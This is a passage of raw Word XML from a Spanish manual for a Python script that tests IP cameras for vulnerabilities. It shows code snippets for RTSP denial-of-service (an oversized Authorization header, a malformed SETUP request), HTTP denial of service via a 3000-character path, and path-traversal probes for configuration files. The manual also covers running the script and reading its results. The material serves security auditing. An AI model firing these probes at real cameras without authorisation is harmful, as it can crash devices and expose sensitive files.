            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1516"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>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 '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>PLAY</w:t>
            </w:r>
            <w:r w:rsidRPr="007E31D4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve"> ' + uri + ' RTSP/1.0\r\n'</w:t>
            </w:r>
          </w:p>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'CSeq: 1\r\n'</w:t>
            </w:r>
          </w:p>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'\r\n'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BD13DB" w:rsidRPr="007E31D4" w:rsidRDefault="00BD13DB"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 = socket.socket()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BD13DB" w:rsidRPr="007E31D4" w:rsidRDefault="00BD13DB"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s.connect((cam_ip, RTSP_PORT))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BD13DB" w:rsidRPr="007E31D4" w:rsidRDefault="00BD13DB" w:rsidP="007E31D4">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E31D4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>s.send(request)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BD13DB" w:rsidRDefault="00BD13DB" w:rsidP="00BD13DB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD13DB" w:rsidRDefault="00BD13DB" w:rsidP="00BD13DB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E31D4">
        <w:t xml:space="preserve">Por medio del método </w:t>
      </w:r>
      <w:r>
        <w:t>TEARDOWN</w:t>
      </w:r>
      <w:r w:rsidRPr="007E31D4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD13DB" w:rsidRPr="007E31D4" w:rsidRDefault="00BD13DB" w:rsidP="00BD13DB">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293"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD13DB" w:rsidRPr="007E31D4">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1516"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6293" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>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 '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>TEARDOWN</w:t>
            </w:r>
            <w:r w:rsidRPr="007E31D4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>' + uri + ' RTSP/1.0\r\n'</w:t>
            </w:r>
          </w:p>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'CSeq: 1\r\n'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BD13DB" w:rsidRPr="007E31D4" w:rsidRDefault="00BD13DB" w:rsidP="00BD13DB">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E31D4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>request+= '\r\n'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BD13DB" w:rsidRPr="007E31D4" w:rsidRDefault="00BD13DB"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 = socket.socket()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BD13DB" w:rsidRPr="007E31D4" w:rsidRDefault="00BD13DB" w:rsidP="007E31D4">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E31D4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>s.connect((cam_ip, RTSP_PORT))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BD13DB" w:rsidRPr="007E31D4" w:rsidRDefault="00BD13DB" w:rsidP="007E31D4">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E31D4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>s.send(request)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BD13DB" w:rsidRDefault="00BD13DB" w:rsidP="00BD13DB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008131C6" w:rsidRPr="00622752" w:rsidRDefault="008131C6" w:rsidP="008131C6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E31D4" w:rsidRDefault="007E31D4" w:rsidP="008131C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E31D4" w:rsidRDefault="00187051" w:rsidP="008131C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Todas estas pruebas</w:t>
      </w:r>
      <w:r w:rsidR="007E31D4">
        <w:t xml:space="preserve"> se realizará</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="007E31D4">
        <w:t xml:space="preserve"> para cada una de las URIs conf</w:t>
      </w:r>
      <w:r>
        <w:t>iguradas en el fichero rtsp</w:t>
      </w:r>
      <w:r w:rsidR="007E31D4">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9521D" w:rsidRDefault="00C9521D" w:rsidP="008131C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001602EB" w:rsidRDefault="00C9521D" w:rsidP="008131C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00173DC6">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RTSP Denial of Service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="006B1D2D">
        <w:t>mediante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> esta prueba se intentará realizar una denegación de servicio</w:t>
      </w:r>
      <w:r w:rsidR="008131C6">
        <w:t xml:space="preserve"> haciendo uso de rtsp. </w:t>
      </w:r>
      <w:r w:rsidR="00187051">
        <w:t>Para ello, existen dos pruebas diferentes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001602EB" w:rsidRDefault="001602EB" w:rsidP="001602EB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00187051">
        <w:t>Enviando una cadena</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>muy larga por la request para tirar el servidor de la cámara</w:t>
      </w:r>
      <w:r w:rsidRPr="007E31D4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001602EB" w:rsidRPr="007E31D4" w:rsidRDefault="001602EB" w:rsidP="001602EB">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293"/>
      </w:tblGrid>
      <w:tr w:rsidR="001602EB" w:rsidRPr="007E31D4">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1516"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6293" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>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auth_big = 'a' * 10000</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request = 'DESCRIBE ' + uri + ' RTSP/1.0\r\n'</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request+= 'CSeq: 1\r\n'</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request+= 'Authorization: Basic %s\r\n' % base64.b64encode(auth_big)</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request+= '\r\n'</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s = socket.socket()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001602EB" w:rsidRPr="00187051" w:rsidRDefault="001602EB" w:rsidP="001602EB">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="2" w:after="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00187051">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>s.connect((cam_ip, RTSP_PORT))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001602EB" w:rsidRDefault="001602EB" w:rsidP="001602EB">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00187051">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>s.send(request)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001602EB" w:rsidRPr="007E31D4" w:rsidRDefault="001602EB" w:rsidP="001602EB">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001602EB" w:rsidRDefault="001602EB" w:rsidP="001602EB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001602EB" w:rsidRDefault="001602EB" w:rsidP="001602EB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enviando por la request una solicitud SETUP malformada</w:t>
      </w:r>
      <w:r w:rsidRPr="007E31D4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001602EB" w:rsidRPr="007E31D4" w:rsidRDefault="001602EB" w:rsidP="001602EB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1440"/>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364"/>
      </w:tblGrid>
      <w:tr w:rsidR="001602EB" w:rsidRPr="007E31D4">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1059"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6364" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>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 = socket.socket()</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s.connect((cam_ip, RTSP_PORT))</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setRequest = 'SETUP / RTSP/1.0\r\n\r\n'</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s.send(setRequest)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00622752" w:rsidRDefault="00622752" w:rsidP="001602EB"/>
    <w:p w:rsidR="00173DC6" w:rsidRPr="00173DC6" w:rsidRDefault="00173DC6" w:rsidP="00173DC6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001602EB" w:rsidRDefault="00173DC6" w:rsidP="00C9521D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00173DC6">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HTTP Denial of Service:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mediante esta prueba se intentará realizar una denegación de servicio haciendo uso de http. Para ello se enviara una cadena muy larga por la request para tirar el servidor de la cámara.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001602EB" w:rsidRPr="007E31D4" w:rsidRDefault="001602EB" w:rsidP="001602EB"/>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364"/>
      </w:tblGrid>
      <w:tr w:rsidR="001602EB" w:rsidRPr="007E31D4">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1368"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6364" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>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request = 'GET /' + "A" * 3000 + '.html HTTP/1.0\r\n'</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 = socket.socket()</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s.connect((cam_ip, HTTP_PORT))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001602EB" w:rsidRPr="001602EB" w:rsidRDefault="001602EB" w:rsidP="001602EB">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="2" w:after="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001602EB">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>s.send(request)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00173DC6" w:rsidRDefault="00173DC6" w:rsidP="001602EB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00173DC6" w:rsidRDefault="00173DC6" w:rsidP="00173DC6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1416"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00173DC6" w:rsidRPr="00173DC6" w:rsidRDefault="00173DC6" w:rsidP="00173DC6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173DC6">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HTTP Path Transversal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>mediante esta prueba se intentará obtener algún fichero de configuración con datos sensibles empleando para ello una conexión http. En esta prueba se hará uso del fichero pathTransversal.txt el cual contiene una biblioteca de los path más típicos por los cuales se puede explotar una vulnerabilidad de este tipo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5716F" w:rsidRPr="007E31D4" w:rsidRDefault="00D5716F" w:rsidP="00D5716F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="72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659"/>
      </w:tblGrid>
      <w:tr w:rsidR="00881E2C" w:rsidRPr="007E31D4">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1368"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6659" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00881E2C" w:rsidRPr="00D5716F" w:rsidRDefault="00881E2C" w:rsidP="00D5716F">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="2" w:after="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D5716F">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>for linea in fPathTransversal:</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request = 'GET ' + linea.replace('\n','') + ' HTTP/1.0\r\n'</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g.write(request + "\r\n")</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print linea.replace('\n','')</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s = socket.socket()</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 xml:space="preserve">s.connect((cam_ip, HTTP_PORT)) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00881E2C" w:rsidRPr="00D5716F" w:rsidRDefault="00881E2C" w:rsidP="00D5716F">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="2" w:after="2"/>
              <w:ind w:left="571" w:firstLine="4"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D5716F">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>s.send(request)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00881E2C" w:rsidRPr="00D5716F" w:rsidRDefault="00881E2C" w:rsidP="00D5716F">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="2" w:after="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00173DC6" w:rsidRDefault="00173DC6" w:rsidP="00173DC6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00173DC6" w:rsidRPr="00173DC6" w:rsidRDefault="00173DC6" w:rsidP="00173DC6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00622752" w:rsidRDefault="00622752">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A4EEE" w:rsidRDefault="009A4EEE" w:rsidP="009A4EEE">
      <w:pPr>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Ejecución</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRDefault="009A4EEE" w:rsidP="009A4EEE">
      <w:r>
        <w:t xml:space="preserve">Para lanzar el script, </w:t>
      </w:r>
      <w:r w:rsidR="00B76284">
        <w:t xml:space="preserve">tras tener instalado Python (ver Anexo 2) y un </w:t>
      </w:r>
      <w:r>
        <w:t>vez configurados los ficheros detallados en el apartado de Configuración</w:t>
      </w:r>
      <w:r w:rsidR="00B76284">
        <w:t>, únicamente hará falta lanzarlo de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881E2C" w:rsidRPr="00881E2C" w:rsidRDefault="00881E2C" w:rsidP="00881E2C"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="-35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837"/>
      </w:tblGrid>
      <w:tr w:rsidR="00881E2C" w:rsidRPr="00881E2C">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="324"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6837" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00881E2C" w:rsidRPr="00881E2C" w:rsidRDefault="00881E2C" w:rsidP="00881E2C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidR="002D08CE">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>python test_rtsp_http.py [arg1] [arg2] … [arg</w:t>
            </w:r>
            <w:r w:rsidRPr="00881E2C">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>N]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00881E2C" w:rsidRPr="00881E2C" w:rsidRDefault="00881E2C" w:rsidP="00881E2C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="2" w:after="2"/>
              <w:ind w:left="571" w:firstLine="4"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="009A4EEE"/>
    <w:p w:rsidR="00622752" w:rsidRDefault="00622752" w:rsidP="009A4EEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00775239" w:rsidRDefault="00A1136B" w:rsidP="00A1136B">
      <w:r w:rsidRPr="00A1136B">
        <w:t>Una vez ejecutado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00775239">
        <w:t>se escribirá tanto por pantalla como en el fichero Output.log de manera más detallada el resultado de las pruebas. Cada prueba tendrá un resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00775239" w:rsidRDefault="00775239" w:rsidP="00775239">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00413D0B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Test OK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> La prueba habrá dado un resultado negativo, por lo que la cámara en cuestión no es vulnerable a la prueba.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00775239" w:rsidRDefault="00775239" w:rsidP="00775239">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00413D0B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Test FAILED!!!!!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> La prueba habrá dado un positivo, por lo que habrá que analizar manualmente si retrata realmente de una cámara vulnerable o un falso positivo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00775239" w:rsidRDefault="00775239" w:rsidP="00775239"/>
    <w:p w:rsidR="002D08CE" w:rsidRDefault="00775239" w:rsidP="00775239">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una vez finalizados todos los tests para todas las cámaras configuradas, se escribirá una traza indicando que la ejecución ha finalizado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00775239">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Test finished</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D08CE" w:rsidRDefault="002D08CE" w:rsidP="00775239"/>
    <w:p w:rsidR="00D5716F" w:rsidRDefault="002D08CE" w:rsidP="002D08CE">
      <w:r>
